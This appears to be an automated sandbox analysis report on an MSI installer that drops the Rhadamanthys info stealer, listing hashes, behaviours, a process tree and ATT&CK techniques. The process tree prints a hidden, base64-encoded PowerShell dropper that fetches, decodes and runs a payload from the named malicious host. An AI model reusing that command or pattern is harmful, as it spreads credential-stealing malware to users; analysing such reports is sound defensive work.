Analysis

  • max time kernel
    1662s
  • max time network
    1482s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-06-2024 12:29

General

  • Target

    setup.msi

  • Size

    25.2MB

  • MD5

    933b86e4ec5b91c804b278b6cb6a87a8

  • SHA1

    d1f4019db27e98d0830013355a2a2c74d4804be4

  • SHA256

    c0a431da531032202fbad12b852d441638214b288103f3584252f23491ca36f7

  • SHA512

    f463e1422251a9795d2e89774e9785970cfd41ee85fda72c3d7216beb53b6a9c37d5152d733942fa834d3662c32e0df5cf9d791534479167863dc01ab1629030

  • SSDEEP

    393216:w+wfUM9W/NReJ2eTLtnOQY2xbEZ1BacivCTvMETonoDpoDp1dXSIpDIj/t:w+ZM0/NRVWLtntY2eZ1BacrvKoDqQpz

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://gotry-gotry.com/2306s1.bs64

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 16 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
  • Program crash 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2252
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3340
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
      1⤵
      • Enumerates connected drives
      • Event Triggered Execution: Installer Packages
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1008
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3460
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding FC56EF6D0B97475A8998EF79B0639EE5
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        PID:4236
      • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
        "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe" x -p2664926658a "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\"
        2⤵
        • Executes dropped EXE
        PID:116
      • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
        "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2828
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe explorer.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AZwBvAHQAcgB5AC0AZwBvAHQAcgB5AC4AYwBvAG0ALwAyADMAMAA2AHMAMQAuAGIAcwA2ADQAIgApADsAWwBCAHkAdABlAFsAXQBdACAAJAB4AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAcwAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACIAYgAiACkALgBSAGUAcABsAGEAYwBlACgAIgBAACIALAAiAGgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJAAiACwAIgBtACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACUAIgAsACIAcAAiACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAiAHYAIgApACkAOwBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAeAAuAEMAbwB1AG4AdAA7ACQAaQArACsAKQB7ACQAeABbACQAaQBdAD0AIAAoACQAeABbACQAaQBdACAALQBiAHgAbwByACAAMQA2ADcAKQAgAC0AYgB4AG8AcgAgADEAOAB9ADsAaQBlAHgAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHgAKQApAA==
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:3464
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 1744
            4⤵
            • Program crash
            PID:3312
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 1764
            4⤵
            • Program crash
            PID:4596
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 1120
            4⤵
            • Program crash
            PID:392
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2796 -ip 2796
      1⤵
        PID:3304
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2796 -ip 2796
        1⤵
          PID:2500
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2796 -ip 2796
          1⤵
            PID:2568

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Persistence

          Event Triggered Execution

          1
          T1546

          Installer Packages

          1
          T1546.016

          Privilege Escalation

          Event Triggered Execution

          1
          T1546

          Installer Packages

          1
          T1546.016

          Discovery

          Query Registry

          1
          T1012

          Peripheral Device Discovery

          1
          T1120

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Config.Msi\e57375f.rbs
            Filesize

            22KB

            MD5

            e4934aa72a1407c298f379ec409737d3

            SHA1

            191c4a0ea404a75d14853bdfa11ece7794ddd979

            SHA256

            71f742d5f56ec1a48a6c4e0357459097e18f83b0626c02efcf88766bdb205183

            SHA512

            e9da3ffbf5d96a9d3b38fe3167fcb01e8b4b0ee36544fdeef8413cc81385acc36ce935e40c2d42044eca4401d71faaedcf9550691a267146ecfec0b513dbc1c4

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oavyt3jl.nsc.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
            Filesize

            494KB

            MD5

            98ccd44353f7bc5bad1bc6ba9ae0cd68

            SHA1

            76a4e5bf8d298800c886d29f85ee629e7726052d

            SHA256

            e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b

            SHA512

            d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar
            Filesize

            375KB

            MD5

            4641c3b0a2124d1fd58b681c47f59a68

            SHA1

            9dd6cfccecef8dba33433dd48e0b1748b242e7e0

            SHA256

            2909b1a698a672775ca42b4d45795888872164fcb945c24763c2fd73577a05f9

            SHA512

            7c43b2b713143643bcd1f505ab99209229b5b5eb0457d2a9d65be03761120f9dd077b99f5bff43dc764fde1091beeffdaff8dd0afe78c5daefc32279234dc38d

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
            Filesize

            639KB

            MD5

            fd3ce044ac234fdab3df9d7f492c470a

            SHA1

            a74a287d5d82a8071ab36c72b2786342d83a8ef7

            SHA256

            0a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba

            SHA512

            86d7e805fab0e5130003facbb1525ee261440846f342f53ae64c3f8d676d1208d5fd9bd91e3222c63cc30c443348eb5ddedab14c8847dae138fba7e9be69d08d

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\tier0_s64.dll
            Filesize

            386KB

            MD5

            7e60404cfb232a1d3708a9892d020e84

            SHA1

            31328d887bee17641608252fb2f9cd6caf8ba522

            SHA256

            5a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766

            SHA512

            4d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\vstdlib_s64.dll
            Filesize

            997KB

            MD5

            bfacc5c0d621440cad40eb75ee1a91b7

            SHA1

            dbaf388e22faa4d9ff3e251dfb626be204439fb6

            SHA256

            e744d96e72ab673d89edb5c3f6cff77956cdabf36a9c920c4ab08450292f9875

            SHA512

            1a4c1f0b921ccafb10b6d79dc5e138a0e4c4b1eb97c0a92f625ac67cffd3f9ee62a953b0f685965d71c0b8ace5f13c9623ae4b01e1c6e360fdc60d885d32b791

          • C:\Windows\Installer\MSI37C9.tmp
            Filesize

            738KB

            MD5

            b158d8d605571ea47a238df5ab43dfaa

            SHA1

            bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

            SHA256

            ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

            SHA512

            56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

          • C:\Windows\Installer\MSI3983.tmp
            Filesize

            1.1MB

            MD5

            1a2b237796742c26b11a008d0b175e29

            SHA1

            cfd5affcfb3b6fd407e58dfc7187fad4f186ea18

            SHA256

            81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730

            SHA512

            3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

          • C:\Windows\Installer\MSI4D5C.tmp
            Filesize

            364KB

            MD5

            54d74546c6afe67b3d118c3c477c159a

            SHA1

            957f08beb7e27e657cd83d8ee50388b887935fae

            SHA256

            f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611

            SHA512

            d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

          • C:\Windows\Installer\e57375c.msi
            Filesize

            25.2MB

            MD5

            933b86e4ec5b91c804b278b6cb6a87a8

            SHA1

            d1f4019db27e98d0830013355a2a2c74d4804be4

            SHA256

            c0a431da531032202fbad12b852d441638214b288103f3584252f23491ca36f7

            SHA512

            f463e1422251a9795d2e89774e9785970cfd41ee85fda72c3d7216beb53b6a9c37d5152d733942fa834d3662c32e0df5cf9d791534479167863dc01ab1629030

          • memory/2796-153-0x0000000000990000-0x00000000009B8000-memory.dmp
            Filesize

            160KB

          • memory/2796-180-0x00007FFA8DA70000-0x00007FFA8DC65000-memory.dmp
            Filesize

            2.0MB

          • memory/2796-154-0x0000000000990000-0x00000000009B8000-memory.dmp
            Filesize

            160KB

          • memory/2796-152-0x0000000000990000-0x00000000009B8000-memory.dmp
            Filesize

            160KB

          • memory/2796-182-0x00000000771F0000-0x0000000077405000-memory.dmp
            Filesize

            2.1MB

          • memory/2796-178-0x0000000005110000-0x0000000005510000-memory.dmp
            Filesize

            4.0MB

          • memory/2796-179-0x0000000005110000-0x0000000005510000-memory.dmp
            Filesize

            4.0MB

          • memory/2828-150-0x000001981E190000-0x000001981E191000-memory.dmp
            Filesize

            4KB

          • memory/3340-185-0x0000000002130000-0x0000000002530000-memory.dmp
            Filesize

            4.0MB

          • memory/3340-188-0x00000000771F0000-0x0000000077405000-memory.dmp
            Filesize

            2.1MB

          • memory/3340-186-0x00007FFA8DA70000-0x00007FFA8DC65000-memory.dmp
            Filesize

            2.0MB

          • memory/3340-183-0x0000000000640000-0x0000000000649000-memory.dmp
            Filesize

            36KB

          • memory/3464-177-0x0000019929070000-0x000001992908C000-memory.dmp
            Filesize

            112KB

          • memory/3464-162-0x0000019928F00000-0x0000019928F22000-memory.dmp
            Filesize

            136KB

          • memory/3464-223-0x000001992A010000-0x000001992A1D2000-memory.dmp
            Filesize

            1.8MB

          • memory/3464-224-0x000001992A710000-0x000001992AC38000-memory.dmp
            Filesize

            5.2MB